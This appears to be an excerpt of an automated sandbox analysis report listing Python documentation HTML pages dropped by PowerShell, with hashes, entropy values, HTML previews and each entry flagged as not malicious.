                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="fileinput . Iterate over lines from multiple input streams" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/fileinput.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/fileinput.py This module implements a helper class and functions to quickly write a loop over standard input or a list of files. If you just want to read or write one file see open..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/f
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):20020
                                                                                                                                                                                                              Entropy (8bit):4.841197066434128
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:1RnHqklpoTndTMeK1ifmcI5QtFnBTMS76zqWTC:vqypEJML16hXFMS762/
                                                                                                                                                                                                              MD5:E3A88AA1BFE00E746AA5E04BBB59CFB1
                                                                                                                                                                                                              SHA1:CC040CF0AA9E2047C1EA47276BBD4369D015666A
                                                                                                                                                                                                              SHA-256:9CD31B8B3067B37E290956C4628BEBDA2A681CEEDE8D75BD17FCCF61610DCCAF
                                                                                                                                                                                                              SHA-512:8C4EACE25EB67181C95EE692C3333DF55B15F844CDF39231881ADF6DD3F365EA73AC928510D8287C682176788F3910FA9A709F63ACC82B2D9DBDD21569026E7B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="File and Directory Access" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/filesys.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The modules described in this chapter deal with disk files and directories. For example, there are modules for reading the properties of files, manipulating paths in a portable way, and creating te..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The modules described in this chapter deal with disk fi
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (482), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):25006
                                                                                                                                                                                                              Entropy (8bit):4.85554849693079
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:TqyZRcM6UfCb2/Qmb2Tte2a8/RX6IXmKMo762/:Tqy8M6UfCb2/Qmb2Tte2a8/RX6IFMo7Z
                                                                                                                                                                                                              MD5:AF1A71F0042CFAFD22AFD8FD11424C94
                                                                                                                                                                                                              SHA1:6A8611FBA8E3EBADFD41ADCBD2E71BE9CE01EA50
                                                                                                                                                                                                              SHA-256:D2316953695722CA43EC0A50B4D17E342A24803E51FB91974F03D406955DA533
                                                                                                                                                                                                              SHA-512:9F2CD1F00760F5E4057C3CC22A3A650EB15476769E765E9167406F730655B2549344D5E2A3EC5E7495EB88F923618A01790E340880ADDA352D18B2C6497DAE89
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="fnmatch . Unix filename pattern matching" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/fnmatch.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/fnmatch.py This module provides support for Unix shell-style wildcards, which are not the same as regular expressions (which are documented in the re module). The special character..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/fnmatch.py This modul
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (781), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):47059
                                                                                                                                                                                                              Entropy (8bit):4.855497512036801
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:OqyGGyM4PpJyLbyQLpRHpMHphHptanZ8gm7V2PdEuAg/KwJPyId1Xj2t/qF1/vvC:OqyEM4PpJyLbyQLpRHpMHphHptaZ8gm3
                                                                                                                                                                                                              MD5:EF4126A6453427FF91E72FAD269275D5
                                                                                                                                                                                                              SHA1:4B67CA8CCDD0FB87A6C81AC9A1ECFBE1AF6034C7
                                                                                                                                                                                                              SHA-256:8CE2F9210E97DD96A7D80787E9BD31320AE19E4E9ECBF972FE2F14F952BEBA02
                                                                                                                                                                                                              SHA-512:83A45D429458F8A92BC032E0A1C6C59105AD0EB21518725E5726887673202BDD33546BD8E55F357889464ADC652C93FE733D0FBB6CB636892C9340EC032E48BE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="fractions . Rational numbers" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/fractions.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/fractions.py The fractions module provides support for rational number arithmetic. A Fraction instance can be constructed from a pair of integers, from another rational number, or ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/fractions.py The fractions modu
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):20953
                                                                                                                                                                                                              Entropy (8bit):4.8480956267516575
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:x5vSHqklxSUNTnUTMlqo4ovvzXgor16bw/wpRT2p6iGqgL+19G30WW1Nqbde41fh:x5vmqyxSeTaM74ovvzXgor16bw/wpRT5
                                                                                                                                                                                                              MD5:C2FB753F897C4429A6847FAABB6A3022
                                                                                                                                                                                                              SHA1:BFA2CC2C6B55A66068BA775F2364E10E1CEA1EB3
                                                                                                                                                                                                              SHA-256:68FB4AC86933CE3E2DFF276E4E595E04999CD4FEF6F94E3422351A5C17FAFE48
                                                                                                                                                                                                              SHA-512:4E6CD23B9B24C296CF329488C167AC7D0394776C3AA1FA119464CD09958E919C99E4100DA4177A5C261E35E3F00A0CE35BA5534C65D95A9041F308FBE2140D05
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Program Frameworks" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/frameworks.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The modules described in this chapter are frameworks that will largely dictate the structure of your program. Currently the modules described here are all oriented toward writing command-line inter..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The modules described in this chapter are frameworks that w
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2026), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):83959
                                                                                                                                                                                                              Entropy (8bit):4.901986398058617
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:eoFqy3MdZki1ZOyloyl5ylcyl4yFByFwWybok6R98nOylQyL4yFByF3MayvyE5ys:ybbM7541pKix/mfb4BA
                                                                                                                                                                                                              MD5:BCA177ACD29078B988FF593E3C469F19
                                                                                                                                                                                                              SHA1:49DF2CACBEADCD02EE6B00164F20CB158AC2DA2A
                                                                                                                                                                                                              SHA-256:7FBF1FBF51877E52D3B57ECC172879D6A2B68A0F71ECB54B18B8358DCAD67C60
                                                                                                                                                                                                              SHA-512:9983DAE50899FF3D2CC7C78615488A6545D71A916A46D2FADB3C82C685C2374506C095ABCE6147B8806F6262BFA6721006595A0854F26C35B22062F6AECDA3A7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="ftplib . FTP protocol client" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/ftplib.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/ftplib.py This module defines the class FTP and a few related items. The FTP class implements the client side of the FTP protocol. You can use this to write Python programs that pe..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/ftplib.py This module defines the
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):15279
                                                                                                                                                                                                              Entropy (8bit):4.818990235056757
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:W9hrnt0KHqkX1vI8MEMgRnCTM8eBO1Kc8My6vnATM8TO76zqWTC:2HqklEIRnCTMgNvnATMj76zqWTC
                                                                                                                                                                                                              MD5:5297A297E2F5CCEDD0C6129FEE60F4CC
                                                                                                                                                                                                              SHA1:EF689A1BCB2F19CDBFC032B8BE76D89014FDADB2
                                                                                                                                                                                                              SHA-256:75079538C119CBC82C56F0DB2E103DEFD7C9C91B911081428D0DF247EF304469
                                                                                                                                                                                                              SHA-512:07DD321EED5D54593CE832C9611A261E563DB01D03C18407E84ABCEDAC4EE1372AC14F3B60DDEB3FAF8A522754EEB84D7B4557D8137ABC7E54BA99A5191317FF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Functional Programming Modules" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/functional.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The modules described in this chapter provide functions and classes that support a functional programming style, and general operations on callables. The following modules are documented in this ch..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The modules described in this chapter provide f
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1053), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):285164
                                                                                                                                                                                                              Entropy (8bit):4.784532379913583
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:waSYI4EDbLEg82J4/TXBqOskfUv+0geVgzMyx3GudA:7F1A
                                                                                                                                                                                                              MD5:A8F432AF66C1FA002946F3CD0CCA0CD5
                                                                                                                                                                                                              SHA1:AD79877875A7E5FDCBD9C80A5728DA1FD47A55BB
                                                                                                                                                                                                              SHA-256:162110061C80EC83DAC8BC14BBF8ACDB030A2B10AC0E7561099FC7F2897FB09D
                                                                                                                                                                                                              SHA-512:59F7C8DA08A8B24E4717F7E1E9EAEDA9BC0B28347968A08AFC7355F8212822B6EE1B901E02D52D4AA89C1E541C473ED27E92B3BBE8F1A702D1B8343DAB71CC2E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Built-in Functions" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/functions.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The Python interpreter has a number of functions and types built into it that are always available. They are listed here in alphabetical order.,,,, Built-in Functions,,, A, abs(), aiter(), all(), a..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The Python interpreter has a number of functions and types b
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (836), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):104126
                                                                                                                                                                                                              Entropy (8bit):4.750998144138724
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:fqyLMxCnxW7t/nVOGqrOMCnnjWHnjtySzyYlgWcXr/RiPqnQISGO/wHoaMLijO/R:ZvFir/qlFzTB4Dc2BjtA
                                                                                                                                                                                                              MD5:76FA55D8D5CFA43824CFE4707642C974
                                                                                                                                                                                                              SHA1:3702B129AF2880DD96B1743A36BB995870A87633
                                                                                                                                                                                                              SHA-256:80176D94DE7C916FCAE8C2AA31DCC149D07477249A946B103CA6273880002472
                                                                                                                                                                                                              SHA-512:98259FAF985CA19687ECE38066B740D423765AB313DEEADFBB9754E7A09084F9F4E7625CF93ACA92814E401EFF74814C53B62CD04682B1A24EF4933F9C9E934E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="functools . Higher-order functions and operations on callable objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/functools.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/functools.py The functools module is for higher-order functions: functions that act on or return other functions. In general, any callable object can be treated as a function for t..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (688), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):46005
                                                                                                                                                                                                              Entropy (8bit):4.891828927510883
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:pqy/8eMbTM0kgbRGw1+y1NHJGLvE+yFCfwIj9+/tDYvNkNEGxeNEx6e3jCMa3yqZ:pqyPMbdkgbRGw1+y1NHJGLvE+yFCf5jz
                                                                                                                                                                                                              MD5:28E6E2A1A8D3AB40B11F327511D340DC
                                                                                                                                                                                                              SHA1:B574151AC295C1CE393BDE3E9E2F04BA8D1B3510
                                                                                                                                                                                                              SHA-256:17D392F1AF95F7339077549C46466181062E216986C0629D35EE29492F62A998
                                                                                                                                                                                                              SHA-512:9507D4A06820F786778545789E31D576CB55FF35AC5EBE4F2533D4224E868C645B8176D53F47E0D6491589C4C62B44721889820EF7926C03F0D28F7AC4324B20
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="gc . Garbage Collector interface" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/gc.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This module provides an interface to the optional garbage collector. It provides the ability to disable the collector, tune the collection frequency, and set debugging options. It also provides acc..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This module provides an interface to the optional g
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (668), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):33033
                                                                                                                                                                                                              Entropy (8bit):4.876633116273508
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:8Louqy0h4d4MNPhnTVFqBzryHDTvBfBzryHkjk/a3VPFp4RroM1ehFdWMaW762/:Uqy4MfXqBzryHDNfBzryHra3VPFp47Lu
                                                                                                                                                                                                              MD5:B61D3FB0D3E58E0DCE85AA3BEFE3BC60
                                                                                                                                                                                                              SHA1:5616525924DC5498A482BA09DBB5E7AEFAD6E7DF
                                                                                                                                                                                                              SHA-256:E1E7A24AE2744B22DB328991E6CE9AECBDBC0E4B66E28027F07D47798501E617
                                                                                                                                                                                                              SHA-512:241AF8117DA460EE67F625AB15A70225F3B53F0838D984A9D2B1AC372336856A9844ECB73904BD0326826DC901B760F7A793EE5B8A14E4E69BEFA5F0C670FF19
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="getopt . C-style parser for command line options" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/getopt.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/getopt.py This module helps scripts to parse the command line arguments in sys.argv. It supports the same conventions as the Unix getopt() function (including the special meanings ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/getopt.py This
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (726), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):19772
                                                                                                                                                                                                              Entropy (8bit):4.868276180765244
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:S75P3HqklJcO2AneTMebveyiy1LyF5QM9U5aC3gIIscL2QnsTM976zqWTC:S9qyey0Meqyiy1LyF+M9U5hpEDCM976A
                                                                                                                                                                                                              MD5:158CD2BBEEDF471B6C8504AAE21A9E4B
                                                                                                                                                                                                              SHA1:9235B34ABA8D0D04F7623A9A5A5F58DEF724CE2F
                                                                                                                                                                                                              SHA-256:1B8C83D50D309D6E31E46420823EEBD1064F80937A4EEC8EEEF311F91AE7D0C8
                                                                                                                                                                                                              SHA-512:16CA8B43B23B58E2D48BAE2E91758CF03026A36EA84F9CCADAD1D9408B0ECDA6ECEA77156D006E0794F9DD6DE57C34435188AA9838BD41EAA5BE0A6D66DC79A8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="getpass . Portable password input" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/getpass.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/getpass.py Availability: not Emscripten, not WASI. This module does not work or is not available on WebAssembly platforms wasm32-emscripten and wasm32-wasi. See WebAssembly platfor..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/getpass.py Availability: not
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1185), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):90036
                                                                                                                                                                                                              Entropy (8bit):4.818829519301875
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:50Mqy4MxkAeXwOyFQneYwyFDegpSeQwM0eqNdlDe6w6dlUes5MLecwwMLeC56dln:GvkAPlt23A
                                                                                                                                                                                                              MD5:459CFE2ED024202BD577027F0786DDE0
                                                                                                                                                                                                              SHA1:F71C7A325D436E4F253F85B481E8EF3AD5D2190E
                                                                                                                                                                                                              SHA-256:538BFDEA1A3BDB126B18FD98B82C00D78356694FB593B63191953FD29C122FF5
                                                                                                                                                                                                              SHA-512:91A78EDCF23D67D536DBB2C42450C8DEDC6B7CB367407A53D24AB4FBDCFF2AA6B51EC579D13F52C73E3C19738BD1DBA9A6680FDBFE656A21C400FA697CD8A841
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="gettext . Multilingual internationalization services" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/gettext.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/gettext.py The gettext module provides internationalization (I18N) and localization (L10N) services for your Python modules and applications. It supports both the GNU gettext messa..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/gettext.p
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1253), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):31644
                                                                                                                                                                                                              Entropy (8bit):4.870915183091606
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:AqyyIZMxMBUw7yF5yFnyYKyY4baUw7yF5yFnyYKyYMCIUUxalrVMp762/:AqyfMxMBUw7yF5yFnyYKyY4baUw7yF58
                                                                                                                                                                                                              MD5:D3FC77D25FCC8B86CBDDC341069AD665
                                                                                                                                                                                                              SHA1:AFEBD7EC855998C10B729220D9BD21AC65E0067C
                                                                                                                                                                                                              SHA-256:22E5872A94EC6CC9694F3D3B00AE355AC8A859827B65F199BB3016828BF31514
                                                                                                                                                                                                              SHA-512:1323DDB75BD247BBC29772DBEEDC71BC1598553AC3D31C6BA0FB7EF23865B930C3956BE9ABF872E13D780695B1F52DFB1CDD7719C91E97C3C3983626D2AA29E5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="glob . Unix style pathname pattern expansion" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/glob.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/glob.py The glob module finds all the pathnames matching a specified pattern according to the rules used by the Unix shell, although results are returned in arbitrary order. No til..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/glob.py The glob mod
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (705), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):38654
                                                                                                                                                                                                              Entropy (8bit):4.873412298983991
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:FqySxaMIxf2yF9CKEsfyCQUw8wkXKybqbdNh4yG4xDrmUoMz762/:Fqy/MIxf2yF9eZ58wkXKybqbdNh4yG4T
                                                                                                                                                                                                              MD5:E3C55F683C8BA3B4EBF74C5EAB33E319
                                                                                                                                                                                                              SHA1:CDC21B91BA644AD9E5F3B7B55A14917D26EB259C
                                                                                                                                                                                                              SHA-256:DB62F03C6EEBD9E0005D4770FBD69429207CAC6487800CCDFC746E93270F0E29
                                                                                                                                                                                                              SHA-512:2161AEC07F39EA58D49FE37507B2710B9A29EF4544C0285B7C59CCB6D63C33933658AF6843A6A8B4ED0A1B28079A5AA789543A46F969F668A7546A997CD062A8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="graphlib . Functionality to operate with graph-like structures" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/graphlib.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/graphlib.py Exceptions: The graphlib module defines the following exception classes:" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/graphlib.py Exceptions: The graphlib module defines the following exception classes:" />..<meta p
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (379), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):19345
                                                                                                                                                                                                              Entropy (8bit):4.878831337906791
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:NUDHqklMognLbTMx7xhsFbJ+YbXV/AtwnLXTMq76zqWTC:SqyMRLMNsFbMYbXV/A6PMq762/
                                                                                                                                                                                                              MD5:51E58681EB9B635C0DB2A50724B1808E
                                                                                                                                                                                                              SHA1:3A2020219CDBFB45DB9BF48F34342FDD09FB7B24
                                                                                                                                                                                                              SHA-256:7DCFC299E7C1EF63C770B5D404C95D194712218980D20BD2A51A5ACA9132F771
                                                                                                                                                                                                              SHA-512:995452DDF482CC6CFAE4D94B7E0E28C73A83F21710E6DE2354729A7BC486FB100CEF899BC54AE7DDA20620976CEBC1752E58F9E47D62D069EE243B42E509A46A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="grp . The group database" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/grp.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This module provides access to the Unix group database. It is available on all Unix versions. Availability: Unix, not Emscripten, not WASI. Group database entries are reported as a tuple-like objec..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This module provides access to the Unix group database. It
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1361), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):52056
                                                                                                                                                                                                              Entropy (8bit):4.856729625152102
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:TIZqyZMaJ0N+LVMy1Ry4WyF4yFfyFXO02fhVyFMyFRy48yF9yFyJdQ/vU0swjkRi:TI50VOaJV0s93zd7A
                                                                                                                                                                                                              MD5:FFCD00F536FEE5851173147D64A7FE52
                                                                                                                                                                                                              SHA1:C3E0DD9A5B18B5ECA0D317C1DD3E64DCCB0F84C1
                                                                                                                                                                                                              SHA-256:AC5899F6036FB1B9757B92635E82C874A57030B479897EE50126DCE57D48FCC8
